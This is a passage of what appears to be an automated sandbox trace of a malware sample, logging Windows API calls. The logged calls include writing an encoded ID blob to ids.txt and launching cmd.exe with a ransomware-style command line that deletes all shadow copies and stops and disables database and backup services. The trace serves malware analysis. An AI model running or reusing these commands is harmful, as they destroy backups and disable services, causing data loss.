Lm\r\n5r F9 JX O0 Yd uw Gb wG wN sD 5N T0 xF 8x fu 2U\r\nLh zz qP Aj 9P Ye hF pg 6p u/ Vt 6V qW lB go OW\r\nA6 fm x8 AF lZ YU 38 Qs Jz 5w +u pA 8s Wh EW a8\r\n39 zI xh P2 Eg gh bv 9d YY lM gI tD As Ve tF Nq\r\nOU zf 6s wv gN dM V7 JJ y4 pt eT YQ 5m CD Y1 Wy\r\nO0 Zx PF SZ JM Pd hE 1d UX B4 st wV RF 84 vx G1\r\nGG m5 Da 96 K9 do bU 7s dF K/ 12 ls 43 cT NX f/\r\nH9 hP fy 99 3I 4Z Gt Ro jT 1N Bc OJ 7Q 4C Bj zq\r\neO f5 It Kn 1b Dm 3b QF ut zs /l az Tb UB 1h n7\r\nX+ UQ vQ QV dv kP 6D aG sh wM vN 1f y9 hY Es sK\r\ne3 I2 MI jG ae ed HV JY WP Kb G9 Cb XE tp Na Nr\r\nYw gK 0w cs Kc /b iT bF ks Gl hY uT rc 3F ms WJ\r\n4A RC Hf Y5 4M s6 go Q3 8q 81 CZ 87 Xu iK M8 tV\r\niY zx zi g4 wF nd 52 hA W4 6z vC YN UX 5c ez db\r\n7q l2 x7 XX OF vC Xf XH 6J uv 6o +E ba PE 7g O8\r\nji 2q Ck Jm 9h Fv Dp pE Yb gm y8 kC 8C bw Nd CE\r\nCi Oh 48 WT 28 IH rI Vt pa uN or 2M n+ Dy 1p iT\r\n+s XV rk iw Au 8= ") returned 1047 [0053.196] lstrcatA (in: lpString1="", lpString2="\r\n" | out: lpString1="\r\n") returned="\r\n" [0053.196] lstrcatA (in: lpString1="\r\n", lpString2="network" | out: lpString1="\r\nnetwork") returned="\r\nnetwork" [0053.196] lstrlenA (lpString="iC Gb VX Zh d4 dF EH lq R1 oD zQ zh dS Oc k3 dm\r\n9k Vz Az EZ Zx UB 9r Ud yE Oj Xr 4q 42 a+ zy a1\r\n9A 7g QA kp 6T FO KU Vd I/ PB 1A vf 1H gB gL h6\r\nK7 qa 0G A+ ox 7Q Vw Hx Dw 7/ EY 7n fC /C jg Lm\r\n5r F9 JX O0 Yd uw Gb wG wN sD 5N T0 xF 8x fu 2U\r\nLh zz qP Aj 9P Ye hF pg 6p u/ Vt 6V qW lB go OW\r\nA6 fm x8 AF lZ YU 38 Qs Jz 5w +u pA 8s Wh EW a8\r\n39 zI xh P2 Eg gh bv 9d YY lM gI tD As Ve tF Nq\r\nOU zf 6s wv gN dM V7 JJ y4 pt eT YQ 5m CD Y1 Wy\r\nO0 Zx PF SZ JM Pd hE 1d UX B4 st wV RF 84 vx G1\r\nGG m5 Da 96 K9 do bU 7s dF K/ 12 ls 43 cT NX f/\r\nH9 hP fy 99 3I 4Z Gt Ro jT 1N Bc OJ 7Q 4C Bj zq\r\neO f5 It Kn 1b Dm 3b QF ut zs /l az Tb UB 1h n7\r\nX+ UQ vQ QV dv kP 6D aG sh wM vN 1f y9 hY Es sK\r\ne3 I2 MI jG ae ed HV JY WP Kb G9 Cb XE tp Na Nr\r\nYw gK 0w cs Kc /b iT bF ks Gl hY uT rc 3F ms WJ\r\n4A RC Hf Y5 4M s6 go Q3 8q 81 CZ 87 Xu iK M8 tV\r\niY zx zi g4 wF nd 52 hA W4 6z vC YN UX 5c ez db\r\n7q l2 x7 XX OF vC Xf XH 6J uv 6o +E ba PE 7g O8\r\nji 2q Ck Jm 9h Fv Dp pE Yb gm y8 kC 8C bw Nd CE\r\nCi Oh 48 WT 28 IH rI Vt pa uN or 2M n+ Dy 1p iT\r\n+s XV rk iw Au 8= \r\nnetwork") returned 1056 [0053.196] RtlInterlockedPopEntrySList (in: ListHead=0xc669c8 | out: ListHead=0xc669c8) returned 0x0 [0053.196] lstrcatA (in: lpString1="", lpString2="\r\n\r\n" | out: lpString1="\r\n\r\n") returned="\r\n\r\n" [0053.196] lstrlenA (lpString="iC Gb VX Zh d4 dF EH lq R1 oD zQ zh dS Oc k3 dm\r\n9k Vz Az EZ Zx UB 9r Ud yE Oj Xr 4q 42 a+ zy a1\r\n9A 7g QA kp 6T FO KU Vd I/ PB 1A vf 1H gB gL h6\r\nK7 qa 0G A+ ox 7Q Vw Hx Dw 7/ EY 7n fC /C jg Lm\r\n5r F9 JX O0 Yd uw Gb wG wN sD 5N T0 xF 8x fu 2U\r\nLh zz qP Aj 9P Ye hF pg 6p u/ Vt 6V qW lB go OW\r\nA6 fm x8 AF lZ YU 38 Qs Jz 5w +u pA 8s Wh EW a8\r\n39 zI xh P2 Eg gh bv 9d YY lM gI tD As Ve tF Nq\r\nOU zf 6s wv gN dM V7 JJ y4 pt eT YQ 5m CD Y1 Wy\r\nO0 Zx PF SZ JM Pd hE 1d UX B4 st wV RF 84 vx G1\r\nGG m5 Da 96 K9 do bU 7s dF K/ 12 ls 43 cT NX f/\r\nH9 hP fy 99 3I 4Z Gt Ro jT 1N Bc OJ 7Q 4C Bj zq\r\neO f5 It Kn 1b Dm 3b QF ut zs /l az Tb UB 1h n7\r\nX+ UQ vQ QV dv kP 6D aG sh wM vN 1f y9 hY Es sK\r\ne3 I2 MI jG ae ed HV JY WP Kb G9 Cb XE tp Na Nr\r\nYw gK 0w cs Kc /b iT bF ks Gl hY uT rc 3F ms WJ\r\n4A RC Hf Y5 4M s6 go Q3 8q 81 CZ 87 Xu iK M8 tV\r\niY zx zi g4 wF nd 52 hA W4 6z vC YN UX 5c ez db\r\n7q l2 x7 XX OF vC Xf XH 6J uv 6o +E ba PE 7g O8\r\nji 2q Ck Jm 9h Fv Dp pE Yb gm y8 kC 8C bw Nd CE\r\nCi Oh 48 WT 28 IH rI Vt pa uN or 2M n+ Dy 1p iT\r\n+s XV rk iw Au 8= \r\nnetwork\r\n\r\n") returned 1060 [0053.196] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b8 [0053.196] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9ed [0053.197] WriteFile (in: hFile=0x2b8, lpBuffer=0x32ee598*, nNumberOfBytesToWrite=0x424, lpNumberOfBytesWritten=0x32ee52c, lpOverlapped=0x0 | out: lpBuffer=0x32ee598*, lpNumberOfBytesWritten=0x32ee52c*=0x424, lpOverlapped=0x0) returned 1 [0053.287] CloseHandle (hObject=0x2b8) returned 1 Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x62dc4000" os_pid = "0xc04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xda8" cmd_line = "C:\\WINDOWS\\system32\\cmd.exe /c @echo off\r\nsc config browser\r\nsc config browser start=enabled\r\nvssadmin delete shadows /all /quiet\r\nsc stop vss\r\nsc config vss start=disabled\r\nsc stop MongoDB\r\nsc config MongoDB start=disabled\r\nsc stop SQLWriter\r\nsc config SQLWriter start=disabled\r\nsc stop MSSQLServerOLAPService\r\nsc config MSSQLServerOLAPService start=disabled\r\nsc stop MSSQLSERVER\r\nsc config MSSQLSERVER start=disabled\r\nsc stop MSSQL$SQLEXPRESS\r\nsc config MSSQL$SQLEXPRESS start=disabled\r\nsc stop ReportServer\r\nsc config ReportServer start=disabled\r\nsc stop OracleServiceORCL\r\nsc config OracleServiceORCL start=disabled\r\nsc stop OracleDBConsoleorcl\r\nsc config OracleDBConsoleorcl start=disabled\r\nsc stop OracleMTSRecoveryService\r\nsc config OracleMTSRecoveryService start=disabled\r\nsc stop OracleVssWriterORCL\r\nsc config OracleVssWriterORCL start=disabled\r\nsc stop MySQL\r\nsc config MySQL start=disabled\r\n" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 3 os_tid = 0x6d8 [0036.698] GetModuleHandleA (lpModuleName=0x0) returned 0x240000 [0036.698] __set_app_type (_Type=0x1) [0036.698] __p__fmode () returned 0x77ae3c14 [0036.698] __p__commode () returned 0x77ae49ec [0036.698] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x256fd0) returned 0x0 [0036.699] __getmainargs (in: _Argc=0x26d1a4, _Argv=0x26d1a8, _Env=0x26d1ac, _DoWildCard=0, _StartInfo=0x26d1b8 | out: _Argc=0x26d1a4, _Argv=0x26d1a8, _Env=0x26d1ac) returned 0 [0036.699] _onexit (_Func=0x258030) returned 0x258030 [0036.699] _onexit (_Func=0x258040) returned 0x258040 [0036.699] _onexit (_Func=0x258050) returned 0x258050 [0036.699] _onexit (_Func=0x258060) returned 0x258060 [0036.699] _onexit (_Func=0x258070) returned 0x258070 [0036.700] _onexit (_Func=0x258080) returned 0x258080 [0036.700] GetCurrentThreadId () returned 0x6d8 [0036.701] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x6d8) returned 0xbc [0036.701] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0036.701] GetProcAddress (hModule=0x75e90000, lpProcName="SetThreadUILanguage") returned 0x75ea4f70 [0036.701] SetThreadUILanguage (LangId=0x0) returned 0x28c0409 [0036.711] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0036.711] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2affd98 | out: phkResult=0x2affd98*=0x0) returned 0x2 [0036.711] VirtualQuery (in: lpAddress=0x2affda3, lpBuffer=0x2affd50, dwLength=0x1c | out: lpBuffer=0x2affd50*(BaseAddress=0x2aff000, AllocationBase=0x2a00000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0036.711] VirtualQuery (in: lpAddress=0x2a00000, lpBuffer=0x2affd50, dwLength=0x1c | out: lpBuffer=0x2affd50*(BaseAddress=0x2a00000, AllocationBase=0x2a00000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0036.711] VirtualQuery (in: lpAddress=0x2a01000, lpBuffer=0x2affd50, dwLength=0x1c | out: lpBuffer=0x2affd50*(BaseAddress=0x2a01000, AllocationBase=0x2a00000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0036.711] VirtualQuery (in: lpAddress=0x2a03000, lpBuffer=0x2affd50, dwLength=0x1c | out: lpBuffer=0x2affd50*(BaseAddress=0x2a03000, AllocationBase=0x2a00000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0036.711] VirtualQuery (in: lpAddress=0x2b00000, lpBuffer=0x2affd50, dwLength=0x1c | out: lpBuffer=0x2affd50*(BaseAddress=0x2b00000, AllocationBase=0x2b00000, AllocationProtect=0x2, RegionSize=0xc5000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0036.711] GetConsoleOutputCP () returned 0x1b5 [0036.716] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x273850 | out: lpCPInfo=0x273850) returned 1 [0036.716] SetConsoleCtrlHandler (HandlerRoutine=0x267260, Add=1) returned 1 [0036.716] _get_osfhandle (_FileHandle=1) returned 0x90 [0036.716] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x27388c | out: lpMode=0x27388c) returned 1 [0036.720] _get_osfhandle (_FileHandle=0) returned 0x8c [0036.720] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0x273888 | out: lpMode=0x273888) returned 1 [0036.762] _get_osfhandle (_FileHandle=1) returned 0x90 [0036.762] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x0) returned 1 [0036.882] _get_osfhandle (_FileHandle=1) returned 0x90 [0036.882] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x273890 | out: lpMode=0x273890) returned 1 [0036.886] _get_osfhandle (_FileHandle=1) returned 0x90 [0036.886] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0036.893] _get_osfhandle (_FileHandle=0) returned 0x8c [0036.893] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0x273894 | out: lpMode=0x273894) returned 1 [0036.897] _get_osfhandle (_FileHandle=0) returned 0x8c [0036.897] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0036.898] GetEnvironmentStringsW () returned 0x2d157c8* [0036.899] GetProcessHeap () returned 0x2d10000 [0036.899] RtlAllocateHeap (HeapHandle=0x2d10000, Flags=0x8, Size=0xaca) returned 0x2d162a0 [0036.899] FreeEnvironmentStringsA (penv="A") returned 1 [0036.899] GetProcessHeap () returned 0x2d10000 [0036.899] RtlAllocateHeap (HeapHandle=0x2d10000, Flags=0x8, Size=0x4) returned 0x2d152a8 [0036.899] GetEnvironmentStringsW () returned 0x2d157c8* [0036.899] GetProcessHeap () returned 0x2d10000 [0036.899] RtlAllocateHeap (HeapHandle=0x2d10000, Flags=0x8, Size=0xaca) returned 0x2d16d78 [0036.899] FreeEnvironmentStringsA (penv="A") returned 1 [0036.899] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2afecf4 | out: phkResult=0x2afecf4*=0xcc) returned 0x0 [0036.899] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2afecfc, lpData=0x2afed00, lpcbData=0x2afecf8*=0x1000 | out: lpType=0x2afecfc*=0x0, lpData=0x2afed00*=0x10, lpcbData=0x2afecf8*=0x1000) returned 0x2 [0036.899] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2afecfc, lpData=0x2afed00, lpcbData=0x2afecf8*=0x1000 | out: lpType=0x2afecfc*=0x4, lpData=0x2afed00*=0x1, lpcbData=0x2afecf8*=0x4) returned 0x0 [0036.899] RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2afecfc, lpData=0x2afed00, lpcbData=0x2afecf8*=0x1000 | out: lpType=0x2afecfc*=0x0, lpData=0x2afed00*=0x1, lpcbData=0x2afecf8*=0x1000) returned 0x2 [0036.899] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2afecfc, lpData=0x2afed00, lpcbData=0x2afecf8*=0x1000 | out: lpType=0x2afecfc*=0x4, lpData=0x2afed00*=0x0, lpcbData=0x2afecf8*=0x4) returned 0x0 [0036.899] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2afecfc, lpData=0x2afed00, lpcbData=0x2afecf8*=0x1000 | out: lpType=0x2afecfc*=0x4, lpData=0x2afed00*=0x40, lpcbData=0x2afecf8*=0x4) returned 0x0 [0036.899] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2afecfc, lpData=0x2afed00, lpcbData=0x2afecf8*=0x1000 | out: lpType=0x2afecfc*=0x4, lpData=0x2afed00*=0x40, lpcbData=0x2afecf8*=0x4) returned 0x0 [0036.899] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2afecfc, lpData=0x2afed00, lpcbData=0x2afecf8*=0x1000 | out: lpType=0x2afecfc*=0x0, lpData=0x2afed00*=0x40, lpcbData=0x2afecf8*=0x1000) returned 0x2 [0036.899] RegCloseKey (hKey=0xcc) returned 0x0 [0036.899] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2afecf4 | out: phkResult=0x2afecf4*=0xcc) returned 0x0 [0036.900] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2afecfc, lpData=0x2afed00, lpcbData=0x2afecf8*=0x1000 | out: lpType=0x2afecfc*=0x0, lpData=0x2afed00*=0x40, lpcbData=0x2afecf8*=0x1000) returned 0x2 [0036.900] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2afecfc, lpData=0x2afed00, lpcbData=0x2afecf8*=0x1000 | out: lpType=0x2afecfc*=0x4, lpData=0x2afed00*=0x1, lpcbData=0x2afecf8*=0x4) returned 0x0 [0036.900] RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2afecfc, lpData=0x2afed00, lpcbData=0x2afecf8*=0x1000 | out: lpType=0x2afecfc*=0x0, lpData=0x2afed00*=0x1, lpcbData=0x2afecf8*=0x1000) returned 0x2 [0036.900] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2afecfc, lpData=0x2afed00, lpcbData=0x2afecf8*=0x1000 | out: lpType=0x2afecfc*=0x4, lpData=0x2afed00*=0x0, lpcbData=0x2afecf8*=0x4) returned 0x0 [0036.900] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2afecfc, lpData=0x2afed00, lpcbData=0x2afecf8*=0x1000 | out: lpType=0x2afecfc*=0x4, lpData=0x2afed00*=0x9, lpcbData=0x2afecf8*=0x4) returned 0x0 [0036.900] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2afecfc, lpData=0x2afed00, lpcbData=0x2afecf8*=0x1000 | out: lpType=0x2afecfc*=0x4, lpData=0x2afed00*=0x9, lpcbData=0x2afecf8*=0x4) returned 0x0 [0036.900] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2afecfc, lpData=0x2afed00, lpcbData=0x2afecf8*=0x1000 | out: lpType=0x2afecfc*=0x0, lpData=0x2afed00*=0x9, lpcbData=0x2afecf8*=0x1000) returned 0x2 [0036.900] RegCloseKey (hKey=0xcc) returned 0x0 [0036.900] time (in: timer=0x0 | out: timer=0x0) returned 0x5cdfa8b1 [0036.900] srand (_Seed=0x5cdfa8b1) [0036.900] GetCommandLineW () returned="C:\\WINDOWS\\system32\\cmd.exe /c @echo off\r\nsc config browser\r\nsc config browser start=enabled\r\nvssadmin delete shadows /all /quiet\r\nsc stop vss\r\nsc config vss start=disabled\r\nsc stop MongoDB\r\nsc config MongoDB start=disabled\r\nsc stop SQLWriter\r\nsc config SQLWriter start=disabled\r\nsc stop MSSQLServerOLAPService\r\nsc config MSSQLServerOLAPService start=disabled\r\nsc stop MSSQLSERVER\r\nsc config MSSQLSERVER start=disabled\r\nsc stop MSSQL$SQLEXPRESS\r\nsc config MSSQL$SQLEXPRESS start=disabled\r\nsc stop ReportServer\r\nsc config ReportServer start=disabled\r\nsc stop OracleServiceORCL\r\nsc config OracleServiceORCL start=disabled\r\nsc stop OracleDBConsoleorcl\r\nsc config OracleDBConsoleorcl start=disabled\r\nsc stop OracleMTSRecoveryService\r\nsc config OracleMTSRecoveryService start=disabled\r\nsc stop OracleVssWriterORCL\r\nsc config OracleVssWriterORCL start=disabled\r\nsc stop MySQL\r\nsc config MySQL start=disabled\r\n" [0036.900] malloc (_Size=0x4000) returned 0x2f22700 [0036.900] GetCommandLineW () returned="C:\\WINDOWS\\system32\\cmd.exe /c @echo off\r\nsc config browser\r\nsc config browser start=enabled\r\nvssadmin delete shadows /all /quiet\r\nsc stop vss\r\nsc config vss start=disabled\r\nsc stop MongoDB\r\nsc config MongoDB start=disabled\r\nsc stop SQLWriter\r\nsc config SQLWriter start=disabled\r\nsc stop MSSQLServerOLAPService\r\nsc config MSSQLServerOLAPService start=disabled\r\nsc stop MSSQLSERVER\r\nsc config MSSQLSERVER start=disabled\r\nsc stop MSSQL$SQLEXPRESS\r\nsc config MSSQL$SQLEXPRESS start=disabled\r\nsc stop ReportServer\r\nsc config ReportServer start=disabled\r\nsc stop OracleServiceORCL\r\nsc config OracleServiceORCL start=disabled\r\nsc stop OracleDBConsoleorcl\r\nsc config OracleDBConsoleorcl start=disabled\r\nsc stop OracleMTSRecoveryService\r\nsc config OracleMTSRecoveryService start=disabled\r\nsc stop OracleVssWriterORCL\r\nsc config OracleVssWriterORCL start=disabled\r\nsc stop MySQL\r\nsc config MySQL start=disabled\r\n" [0036.900] malloc (_Size=0xffce) returned 0x2e10048 [0036.901] ??_V@YAXPAX@Z () returned 0x2affcd8 [0036.901] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x2e10048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0036.902] malloc (_Size=0xffce) returned 0x2e20020 [0036.902] ??_V@YAXPAX@Z () returned 0x2affaac [0036.902] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2e20020, nSize=0x7fe7 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0036.903] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x26f840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0036.903] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x26f840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.903] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x26f840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0036.903] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0036.903] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0036.903] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0036.903] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0036.903] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0036.903] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0036.903] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0036.903] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0036.903] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0036.903] GetProcessHeap () returned 0x2d10000 [0036.903] RtlFreeHeap (HeapHandle=0x2d10000, Flags=0x0, BaseAddress=0x2d162a0) returned 1 [0036.903] GetEnvironmentStringsW () returned 0x2d18340* [0036.903] GetProcessHeap () returned 0x2d10000 [0036.903] RtlAllocateHeap (HeapHandle=0x2d10000, Flags=0x8, Size=0xae2) returned 0x2d157c8 [0036.903] FreeEnvironmentStringsA (penv="A") returned 1 [0036.903] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x26f840, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0036.903] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x26f840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0036.903] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0036.903] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0036.903] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0036.903] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0036.903] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0036.903] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0036.903] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0036.903] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0036.904] malloc (_Size=0xffce) returned 0x2e2fff8 [0036.904] ??_V@YAXPAX@Z () returned 0x2aff844 [0036.904] GetProcessHeap () returned 0x2d10000 [0036.904] RtlAllocateHeap (HeapHandle=0x2d10000, Flags=0x8, Size=0x38) returned 0x2d162b8 [0036.904] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x2e2fff8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0036.904] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x7fe7, lpBuffer=0x2e2fff8, lpFilePart=0x2aff890 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x2aff890*="Desktop") returned 0x17 [0036.905] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0036.905] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2aff610 | out: lpFindFileData=0x2aff610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x2d162f8 [0036.905] FindClose (in: hFindFile=0x2d162f8 | out: hFindFile=0x2d162f8) returned 1 [0036.905] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0x2aff610 | out: lpFindFileData=0x2aff610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x2d162f8 [0036.905] FindClose (in: hFindFile=0x2d162f8 | out: hFindFile=0x2d162f8) returned 1 [0036.905] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0x2aff610 | out: lpFindFileData=0x2aff610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x6bb576d3, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x6bb576d3, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x2d162f8 [0036.905] FindClose (in: hFindFile=0x2d162f8 | out: hFindFile=0x2d162f8) returned 1 [0036.905] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0036.905] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0036.906] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0036.906] GetProcessHeap () returned 0x2d10000 [0036.906] RtlFreeHeap (HeapHandle=0x2d10000, Flags=0x0, BaseAddress=0x2d157c8) returned 1 [0036.906] GetEnvironmentStringsW () returned 0x2d18e68* [0036.906] GetProcessHeap () returned 0x2d10000 [0036.906] RtlAllocateHeap (HeapHandle=0x2d10000, Flags=0x8, Size=0xb1a) returned 0x2d19990 [0036.906] FreeEnvironmentStringsA (penv="=") returned 1 [0036.906] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x2e10048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0036.906] GetProcessHeap () returned 0x2d10000 [0036.906] RtlFreeHeap (HeapHandle=0x2d10000, Flags=0x0, BaseAddress=0x2d162b8) returned 1 [0036.906] ??_V@YAXPAX@Z () returned 0x1 [0036.906] ??_V@YAXPAX@Z () returned 0x1 [0036.906] GetProcessHeap () returned 0x2d10000 [0036.906] RtlAllocateHeap (HeapHandle=0x2d10000, Flags=0x8, Size=0x400e) returned 0x2d1a4b8 [0036.907] GetProcessHeap () returned 0x2d10000 [0036.907] RtlAllocateHeap (HeapHandle=0x2d10000, Flags=0x8, Size=0x6de) returned 0x2d10ae0 [0036.907] GetProcessHeap () returned 0x2d10000 [0036.907] RtlFreeHeap 